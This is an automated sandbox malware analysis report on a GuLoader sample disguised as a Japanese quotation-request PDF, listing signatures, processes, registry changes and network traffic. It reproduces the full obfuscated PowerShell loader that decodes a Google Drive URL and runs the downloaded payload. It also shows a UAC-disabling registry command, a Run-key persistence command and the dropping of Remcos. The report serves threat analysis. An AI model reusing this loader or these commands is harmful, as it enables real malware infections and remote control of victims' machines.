Malware Analysis Report

2025-06-16 03:44

Sample ID 240325-d9zk1aab3v
Target 見積依頼先_(OU)_OSAKA-2024100044-05JP·pdf.zip
SHA256 903ab5d44a560508bd22ad1dd43fb10e603f1cdc7478dbec70f58c772294f56c
Tags
guloader downloader evasion persistence trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

903ab5d44a560508bd22ad1dd43fb10e603f1cdc7478dbec70f58c772294f56c

Threat Level: Known bad

The file 見積依頼先_(OU)_OSAKA-2024100044-05JP·pdf.zip was found to be: Known bad.

Malicious Activity Summary

guloader downloader evasion persistence trojan

UAC bypass

Guloader,Cloudeye

Blocklisted process makes network request

Executes dropped EXE

Checks computer location settings

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of SetThreadContext

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: MapViewOfSection

Modifies registry class

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Modifies registry key

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-25 03:43

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-25 03:43

Reported

2024-03-25 03:53

Platform

win10v2004-20240226-ja

Max time kernel

522s

Max time network

442s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\見積依頼先_(OU)_OSAKA-2024100044-05JP·pdf.vbs"

Signatures

Guloader,Cloudeye

downloader guloader

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\ProgramData\Remcos\remcos.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Rmc-KQ00DZ = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" C:\Program Files (x86)\windows mail\wab.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Startup key = "%Melaxuma% -w 1 $Ladys=(Get-ItemProperty -Path 'HKCU:\\Hooves\\').Handelsordreregistret;%Melaxuma% ($Ladys)" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rmc-KQ00DZ = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" C:\Program Files (x86)\windows mail\wab.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4732 set thread context of 4280 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000_Classes\Local Settings C:\ProgramData\Remcos\remcos.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Program Files (x86)\windows mail\wab.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\svchost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1916 wrote to memory of 2320 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1916 wrote to memory of 2320 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2320 wrote to memory of 2888 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2320 wrote to memory of 2888 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2320 wrote to memory of 4732 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2320 wrote to memory of 4732 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2320 wrote to memory of 4732 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 4732 wrote to memory of 2092 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4732 wrote to memory of 2092 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4732 wrote to memory of 2092 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4732 wrote to memory of 4280 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4732 wrote to memory of 4280 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4732 wrote to memory of 4280 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4732 wrote to memory of 4280 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4732 wrote to memory of 4280 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4280 wrote to memory of 3540 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 4280 wrote to memory of 3540 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 4280 wrote to memory of 3540 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 3540 wrote to memory of 5096 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3540 wrote to memory of 5096 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3540 wrote to memory of 5096 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4280 wrote to memory of 3080 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 4280 wrote to memory of 3080 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 4280 wrote to memory of 3080 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 4280 wrote to memory of 3128 N/A C:\Program Files (x86)\windows mail\wab.exe C:\ProgramData\Remcos\remcos.exe
PID 4280 wrote to memory of 3128 N/A C:\Program Files (x86)\windows mail\wab.exe C:\ProgramData\Remcos\remcos.exe
PID 4280 wrote to memory of 3128 N/A C:\Program Files (x86)\windows mail\wab.exe C:\ProgramData\Remcos\remcos.exe
PID 3080 wrote to memory of 4312 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3080 wrote to memory of 4312 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3080 wrote to memory of 4312 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\見積依頼先_(OU)_OSAKA-2024100044-05JP·pdf.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Ironiserende Imborder Hulheden Peabird Lnkens Anstdssten #>;$Pebermynters=(cmd /c set /A 115^^0);Function albertuss ([String]$Armariolum215){$Pebermynters=[char][int]$Pebermynters;$Stikpiller=$Pebermynters+'ubstring';$Mistletoes=8;$Afhudes=Ridefogders($Armariolum215);For($Coapprover=7; $Coapprover -lt $Afhudes; $Coapprover+=$Mistletoes){$Dendropogon=$Armariolum215.$Stikpiller.Invoke($Coapprover, 1);$Konsistorialkontor=$Konsistorialkontor+$Dendropogon;}$Konsistorialkontor;}function Reflectorizing ($Frsteviolin){. ($Rebuffably) ($Frsteviolin);}function Ridefogders ([String]$Sagregisteret){$Enucleator=$Sagregisteret.Length-1;$Enucleator;}$Iatrochemical=albertuss ' RegistTEkspertrContradaHypothenSabelkas ,insenf BoppeneIncongrrBaadskar,enzinti randlonPr,gresg Ag rsk ';$Mynas248=albertuss 'JennifehPredicttExtremitUnm.ddlpMalkendsAurined:Addi,en/attaina/ Zonet dMetamorrIncir,ui OvereavNeuro.aeg.nandr. Indregg GangshoMu keorohemielygChimangl OrbitseUdebliv.PitchpocInterbloElsewismSyvstje/Caratesu PulvercAfklaps?svendepe Byplanx FormprpAkasastoAnaerobr Ver,entBloddon=StephandBazonbuoBughindw Hindign ExocyclThermo o Dueu ta CormacdIndkald&.ectumciAtelierd Narrat=Kveller1Tr nchctAttribunOvervioXd gpengrConvexiXBekranscCowli,ehEndu eovGleaminMBesmokeoPomaryuxGingerlF.ikkestTP,colete skatebWScuddl 7OutdariSLyophillSt.vens3 samariF Ma,vasRArmadae0SkippenmUd.ikli9ri.striy No,trawVestas.4RepaireO agocy3 WranglxFidusku2 C.rameXHollywo ';$Rebuffably=albertuss 'QuintusiSauerkrekvoterexfys,ote ';$Gooseskin=albertuss 'Indko,t$,nderbegSkrofu l FactuaoBastonabPlanetgaUnmeedyl Sieurs:FoleykuPExtenderBrayekoeSubnatua KontincZethstehExclaimeCurnst sMander Sk,somm=Film nd UnsizedS BoghantNigeriaaThermosrPhutplat Forpl.-HathawaBTheodidiEndossetDybl rnsFacitteT minsterM sonsbaFle.gudn MalerlsMultisefNothinge ForstrrKon.ito Underdi-GarageaSSubstano D.urwau An epar Rohanlc ball.teCockney Sideord$A.choreMOpvarmey I,termnhelicota Simu.asNastali2Tr ndse4Renegot8ltgbeck Barrela-KommentD Tekstbe Indb.ss Ventelt VialfuiUngskuen Enter,aSmugkrotKvk eneiImpedimoInf,acenFendill Unci l$Crunc iS Aoua sc ckeeinhRavespoiCorditizHabitaboGerrigtmSuperdeeGenopnardittiesiGadroona Papste ';Reflectorizing (albertuss 'Droumy,$JernfilgIm.odyil offosoLatrantbSkrmstyaD iverel Megaby:StudebaS telepac,egentshSpelliniTronfraztilfileo.isacchmMat.ikeeDhikrsgrFistelsiForfatta Finans=Escadri$LithopheAcidaspnCoregnavUnassai:CyklonbahovedskpFa,keltp TricoldForsy,iaL.vordet remun.aCoun er ') ;Reflectorizing (albertuss 'WienerpIPachy.emZ osporpCytoanaoPseudoprPregaintDr.kneu-SaucepaMOrlogs.oPplretedUndivulu atomf,lAttentie Sauced Cul,asuBPreexchiR mfiretKej,haasMargentTSvrindurCellarea,loakstnWrinklesSt.tikefOrdrerse oct.merAcetona ') ;$Schizomeria=$Schizomeria+'\Bjdens.Ant' ;Reflectorizing (albertuss 'Impa si$popp.ydgForbog,lA,rsagso strobobLoud rbaSneplovlTju.hne: PreconFholarctr DaahinoD.spitusTab lattCombinef Fangstr KaabesiAcajou e DermossSkaberg=propful(Do.beltTInputsteUn.hospsvernonitRuedesc- OliehoPRynkes,aHo,semotEnt,robhRegiste Pharmac$MegaaraSStjernecOver,tthGo,otheiAfskallzKalendeo isorlimPlannedeAfrignirIndkrediFerdiadaBilleds)gormssk ') ;while (-not $Frostfries) {Reflectorizing (albertuss 'Dis ikoIKabsminfFerashs Mon cid(Stormpr$Jg.rsprPFran,kgrIns.lare JiffphaMy.midoc Rit,alh SlangeeSmykkeasFlui.um.Pikt,grJGodkendoTilemakbConferrSHjforrdtA.tokraa RelatitIrasja e Bestse Bunomas-Puk,erheSailyfaqR micat Forske$HalvhedI Ba,kgaaGazernetMishandrAbstineoavisartcGaaretnhHerpesteHeterosmIndbe eiHjlan scKursor.aSaddelml Mammit)Faklen Fortykk{CanafisSInterkitSu erhea Sspejdr Mone.atVetkous-SvedsbySDiagonalBeskydeePointere BambuspMoyit s I.comme1 shiesp}Fjor,reeTjenestlOomancysSoldateeDybdahl{ Tro,heS KondictForkobraBekosterSocialatSanguif- ConchoSEnkeltvlFlygtnieSyno,yme Se.skapKa,abas Delumin1Pigenav;Dobbe rR Diquate ReprodfAndaluslSpati teVideregc Toxifet Udsta.o ,outgjrAnnihili Ant,pazGrundtaidjvlehon iolsflg.hamabl Balloan$ QuelchG Besu.loMetricaoNon,arrsS.aansoeFlimsyssFotoalbkBrillefiMomsersnUnfoxy.}ulovmed ');Reflectorizing (albertuss 'Brnds.l$Hugger,g O ertilOch,mysoRetreatbSkrivesaFor,ikllAfvikli:Unvnel.FParrotsr PedelloB weryls RodenstAffarvef Aley.rr skilniimanac seMismatcsMakvrke=overado(SvartbaTminimereGr.tuitsunddragtpre ect-PortepePRemplacaImprgnetAlbedogh Pe.hyd Hitherw$SpingelSRingstec KolerihObskurfi DressrzSaccomyoUninhibmVarmefreDiphyllrUover,oi Lint.laKapacit)Hjlpepr ') ;}Reflectorizing (albertuss 'Her.eli$ Skon egsubstanlSanatoroHaandhvbCorrivaaTwitchel orrupt:BestialaRibbonenAflnni,tpen estiHypoders F,rtrycInfrasphXylof,noSwollenl L,anabaHalimous rappitTho,ougi Rewardc Rumm naForcibllRet inilHyperthyyagouru Afblegn=Spizzer ForvarmGAtomulyeReprimat Ugelan-AvertdeC NemospoForm ivnAuthorit nlbenpeskilrednBesvrlitSouveni Ron edo$HalvgudSGuldrancTjurhnehMelis aiFriz,grz TilhngoInterprmBeyli.aeE.stemprDeglam.iBgededea,jrnsol ');Reflectorizing (albertuss 'Headsai$ ForesogSynkronlNyttevioUforgngbOceanolaExquisilDrmmesy: Int,rmBUnivocae mennesfAr illeoCy niderRa,iospdUnreturrEuropewiUdenlann BendtlgKarolinsPrsen,am EarpiciLousedtdUnikkesl AfklapeIsoclinrSavedes2D.missi0affress1Armeni, .anebor=Coconu. ,ildoe[ StybbaSCh onicyComproms DinarztP,anetaeFlagermm Resinr. BornhoCKvivaleoMetastanEgelkkevBambu reRaisedarStampemtPutativ]Utu.ten:Gennemb:ElectroF Age.dar Ol enbo Subpiam Sop.edB angensaTactualsKondoleeBlndvrk6 udesth4OligospS BredbatMislighrSwordm,iAdolphcnflorifig svajry(Evoluti$Del.algaIndtrkknFormrketPropolsiRoughlesHol quicPreferehFr.sepuo,nytninl H rregaSolcellsMy tiqutKonneksiTricarbcrkeen.eaBitte.ll,lagterlMarblieyFladetp) Volumi ');Reflectorizing (albertuss ' esecti$Sin.erlgUncocksl ,atrilo Meg spbSuperdua Stern.lAl onym: Wit.edB Nomadel Vol.nttGeosciee Ti sspsFruticut ZygobreKildetedSpirit.eNeologirHeterolsLakerer Tyrerin=Opspori Trafika[InkonseSTrolde yS rannesArchductUnpervee DiphthmHarmoni. Fjer,kTPigmentevisernexUndershtPistill. Er.ticEKaolinsnRe.eldic PartreoAspirandOveranaiTros.amnKoda.isgBerigei]Maddike:Skyndte:PrettyiAKnbjninSMicromeCTnderenI BogsidIUnfooli..ennemsGRedninge OvervitRaafrugSAthrocytCon inurBathyali gazolynFetichigTapestr(.utobio$ ValutaBApathieeZoologifIncaveroLaputapr discladKattefjrVi orisiDraconin.isarmegKaoli,is Urege.m P.rensi Foruredsprng,rl Fusarie UnsocirSte mti2Indhyll0hemmeli1Pollina)Polyr.y ');Reflectorizing (albertuss ' Naturs$UnpagangPro andl Gener onedga,gb SprngsaProbosclEnkelta: EmanerMSovietioOutshamd HammedvKolkhosiCuratiznPragmatdTamponeePurinsbnDrivmid=transvo$RejfernBCand,lllPampin t Neutrae GenoptsAdiaphotThroatle ummertdSalleeteHemocoer Rebaptstimingf.BimahvasNotifi,u Empa sbBo ardosFissipetReferrerpree.apiResi.uan,entefrgDommerk(Kderege3Taragec5Legemli0 Udmeld4Spoke,w3Magneti9Rengjo , Cynanc3Afskrab1 Unperc7gymnasi5 Ukorre0Praefik)Bronkos ');Reflectorizing $Modvinden;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c set /A 115^^0

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Ironiserende Imborder Hulheden Peabird Lnkens Anstdssten #>;$Pebermynters=(cmd /c set /A 115^^0);Function albertuss ([String]$Armariolum215){$Pebermynters=[char][int]$Pebermynters;$Stikpiller=$Pebermynters+'ubstring';$Mistletoes=8;$Afhudes=Ridefogders($Armariolum215);For($Coapprover=7; $Coapprover -lt $Afhudes; $Coapprover+=$Mistletoes){$Dendropogon=$Armariolum215.$Stikpiller.Invoke($Coapprover, 1);$Konsistorialkontor=$Konsistorialkontor+$Dendropogon;}$Konsistorialkontor;}function Reflectorizing ($Frsteviolin){. ($Rebuffably) ($Frsteviolin);}function Ridefogders ([String]$Sagregisteret){$Enucleator=$Sagregisteret.Length-1;$Enucleator;}$Iatrochemical=albertuss ' RegistTEkspertrContradaHypothenSabelkas ,insenf BoppeneIncongrrBaadskar,enzinti randlonPr,gresg Ag rsk ';$Mynas248=albertuss 'JennifehPredicttExtremitUnm.ddlpMalkendsAurined:Addi,en/attaina/ Zonet dMetamorrIncir,ui OvereavNeuro.aeg.nandr. Indregg GangshoMu keorohemielygChimangl OrbitseUdebliv.PitchpocInterbloElsewismSyvstje/Caratesu PulvercAfklaps?svendepe Byplanx FormprpAkasastoAnaerobr Ver,entBloddon=StephandBazonbuoBughindw Hindign ExocyclThermo o Dueu ta CormacdIndkald&.ectumciAtelierd Narrat=Kveller1Tr nchctAttribunOvervioXd gpengrConvexiXBekranscCowli,ehEndu eovGleaminMBesmokeoPomaryuxGingerlF.ikkestTP,colete skatebWScuddl 7OutdariSLyophillSt.vens3 samariF Ma,vasRArmadae0SkippenmUd.ikli9ri.striy No,trawVestas.4RepaireO agocy3 WranglxFidusku2 C.rameXHollywo ';$Rebuffably=albertuss 'QuintusiSauerkrekvoterexfys,ote ';$Gooseskin=albertuss 'Indko,t$,nderbegSkrofu l FactuaoBastonabPlanetgaUnmeedyl Sieurs:FoleykuPExtenderBrayekoeSubnatua KontincZethstehExclaimeCurnst sMander Sk,somm=Film nd UnsizedS BoghantNigeriaaThermosrPhutplat Forpl.-HathawaBTheodidiEndossetDybl rnsFacitteT minsterM sonsbaFle.gudn MalerlsMultisefNothinge ForstrrKon.ito Underdi-GarageaSSubstano D.urwau An epar Rohanlc ball.teCockney Sideord$A.choreMOpvarmey I,termnhelicota Simu.asNastali2Tr ndse4Renegot8ltgbeck Barrela-KommentD Tekstbe Indb.ss Ventelt VialfuiUngskuen Enter,aSmugkrotKvk eneiImpedimoInf,acenFendill Unci l$Crunc iS Aoua sc ckeeinhRavespoiCorditizHabitaboGerrigtmSuperdeeGenopnardittiesiGadroona Papste ';Reflectorizing (albertuss 'Droumy,$JernfilgIm.odyil offosoLatrantbSkrmstyaD iverel Megaby:StudebaS telepac,egentshSpelliniTronfraztilfileo.isacchmMat.ikeeDhikrsgrFistelsiForfatta Finans=Escadri$LithopheAcidaspnCoregnavUnassai:CyklonbahovedskpFa,keltp TricoldForsy,iaL.vordet remun.aCoun er ') ;Reflectorizing (albertuss 'WienerpIPachy.emZ osporpCytoanaoPseudoprPregaintDr.kneu-SaucepaMOrlogs.oPplretedUndivulu atomf,lAttentie Sauced Cul,asuBPreexchiR mfiretKej,haasMargentTSvrindurCellarea,loakstnWrinklesSt.tikefOrdrerse oct.merAcetona ') ;$Schizomeria=$Schizomeria+'\Bjdens.Ant' ;Reflectorizing (albertuss 'Impa si$popp.ydgForbog,lA,rsagso strobobLoud rbaSneplovlTju.hne: PreconFholarctr DaahinoD.spitusTab lattCombinef Fangstr KaabesiAcajou e DermossSkaberg=propful(Do.beltTInputsteUn.hospsvernonitRuedesc- OliehoPRynkes,aHo,semotEnt,robhRegiste Pharmac$MegaaraSStjernecOver,tthGo,otheiAfskallzKalendeo isorlimPlannedeAfrignirIndkrediFerdiadaBilleds)gormssk ') ;while (-not $Frostfries) {Reflectorizing (albertuss 'Dis ikoIKabsminfFerashs Mon cid(Stormpr$Jg.rsprPFran,kgrIns.lare JiffphaMy.midoc Rit,alh SlangeeSmykkeasFlui.um.Pikt,grJGodkendoTilemakbConferrSHjforrdtA.tokraa RelatitIrasja e Bestse Bunomas-Puk,erheSailyfaqR micat Forske$HalvhedI Ba,kgaaGazernetMishandrAbstineoavisartcGaaretnhHerpesteHeterosmIndbe eiHjlan scKursor.aSaddelml Mammit)Faklen Fortykk{CanafisSInterkitSu erhea Sspejdr Mone.atVetkous-SvedsbySDiagonalBeskydeePointere BambuspMoyit s I.comme1 shiesp}Fjor,reeTjenestlOomancysSoldateeDybdahl{ Tro,heS KondictForkobraBekosterSocialatSanguif- ConchoSEnkeltvlFlygtnieSyno,yme Se.skapKa,abas Delumin1Pigenav;Dobbe rR Diquate ReprodfAndaluslSpati teVideregc Toxifet Udsta.o ,outgjrAnnihili Ant,pazGrundtaidjvlehon iolsflg.hamabl Balloan$ QuelchG Besu.loMetricaoNon,arrsS.aansoeFlimsyssFotoalbkBrillefiMomsersnUnfoxy.}ulovmed ');Reflectorizing (albertuss 'Brnds.l$Hugger,g O ertilOch,mysoRetreatbSkrivesaFor,ikllAfvikli:Unvnel.FParrotsr PedelloB weryls RodenstAffarvef Aley.rr skilniimanac seMismatcsMakvrke=overado(SvartbaTminimereGr.tuitsunddragtpre ect-PortepePRemplacaImprgnetAlbedogh Pe.hyd Hitherw$SpingelSRingstec KolerihObskurfi DressrzSaccomyoUninhibmVarmefreDiphyllrUover,oi Lint.laKapacit)Hjlpepr ') ;}Reflectorizing (albertuss 'Her.eli$ Skon egsubstanlSanatoroHaandhvbCorrivaaTwitchel orrupt:BestialaRibbonenAflnni,tpen estiHypoders F,rtrycInfrasphXylof,noSwollenl L,anabaHalimous rappitTho,ougi Rewardc Rumm naForcibllRet inilHyperthyyagouru Afblegn=Spizzer ForvarmGAtomulyeReprimat Ugelan-AvertdeC NemospoForm ivnAuthorit nlbenpeskilrednBesvrlitSouveni Ron edo$HalvgudSGuldrancTjurhnehMelis aiFriz,grz TilhngoInterprmBeyli.aeE.stemprDeglam.iBgededea,jrnsol ');Reflectorizing (albertuss 'Headsai$ ForesogSynkronlNyttevioUforgngbOceanolaExquisilDrmmesy: Int,rmBUnivocae mennesfAr illeoCy niderRa,iospdUnreturrEuropewiUdenlann BendtlgKarolinsPrsen,am EarpiciLousedtdUnikkesl AfklapeIsoclinrSavedes2D.missi0affress1Armeni, .anebor=Coconu. ,ildoe[ StybbaSCh onicyComproms DinarztP,anetaeFlagermm Resinr. BornhoCKvivaleoMetastanEgelkkevBambu reRaisedarStampemtPutativ]Utu.ten:Gennemb:ElectroF Age.dar Ol enbo Subpiam Sop.edB angensaTactualsKondoleeBlndvrk6 udesth4OligospS BredbatMislighrSwordm,iAdolphcnflorifig svajry(Evoluti$Del.algaIndtrkknFormrketPropolsiRoughlesHol quicPreferehFr.sepuo,nytninl H rregaSolcellsMy tiqutKonneksiTricarbcrkeen.eaBitte.ll,lagterlMarblieyFladetp) Volumi ');Reflectorizing (albertuss ' esecti$Sin.erlgUncocksl ,atrilo Meg spbSuperdua Stern.lAl onym: Wit.edB Nomadel Vol.nttGeosciee Ti sspsFruticut ZygobreKildetedSpirit.eNeologirHeterolsLakerer Tyrerin=Opspori Trafika[InkonseSTrolde yS rannesArchductUnpervee DiphthmHarmoni. Fjer,kTPigmentevisernexUndershtPistill. Er.ticEKaolinsnRe.eldic PartreoAspirandOveranaiTros.amnKoda.isgBerigei]Maddike:Skyndte:PrettyiAKnbjninSMicromeCTnderenI BogsidIUnfooli..ennemsGRedninge OvervitRaafrugSAthrocytCon inurBathyali gazolynFetichigTapestr(.utobio$ ValutaBApathieeZoologifIncaveroLaputapr discladKattefjrVi orisiDraconin.isarmegKaoli,is Urege.m P.rensi Foruredsprng,rl Fusarie UnsocirSte mti2Indhyll0hemmeli1Pollina)Polyr.y ');Reflectorizing (albertuss ' Naturs$UnpagangPro andl Gener onedga,gb SprngsaProbosclEnkelta: EmanerMSovietioOutshamd HammedvKolkhosiCuratiznPragmatdTamponeePurinsbnDrivmid=transvo$RejfernBCand,lllPampin t Neutrae GenoptsAdiaphotThroatle ummertdSalleeteHemocoer Rebaptstimingf.BimahvasNotifi,u Empa sbBo ardosFissipetReferrerpree.apiResi.uan,entefrgDommerk(Kderege3Taragec5Legemli0 Udmeld4Spoke,w3Magneti9Rengjo , Cynanc3Afskrab1 Unperc7gymnasi5 Ukorre0Praefik)Bronkos ');Reflectorizing $Modvinden;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c set /A 115^^0

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Melaxuma% -w 1 $Ladys=(Get-ItemProperty -Path 'HKCU:\Hooves\').Handelsordreregistret;%Melaxuma% ($Ladys)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Melaxuma% -w 1 $Ladys=(Get-ItemProperty -Path 'HKCU:\Hooves\').Handelsordreregistret;%Melaxuma% ($Ladys)"

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\ProgramData\Remcos\remcos.exe

"C:\ProgramData\Remcos\remcos.exe"

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k UnistackSvcGroup

Network

Country Destination Domain Proto
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
GB 172.217.169.78:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 142.250.180.1:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 78.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 1.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 104.241.123.92.in-addr.arpa udp
US 8.8.8.8:53 119.110.54.20.in-addr.arpa udp
US 8.8.8.8:53 176.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 32.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
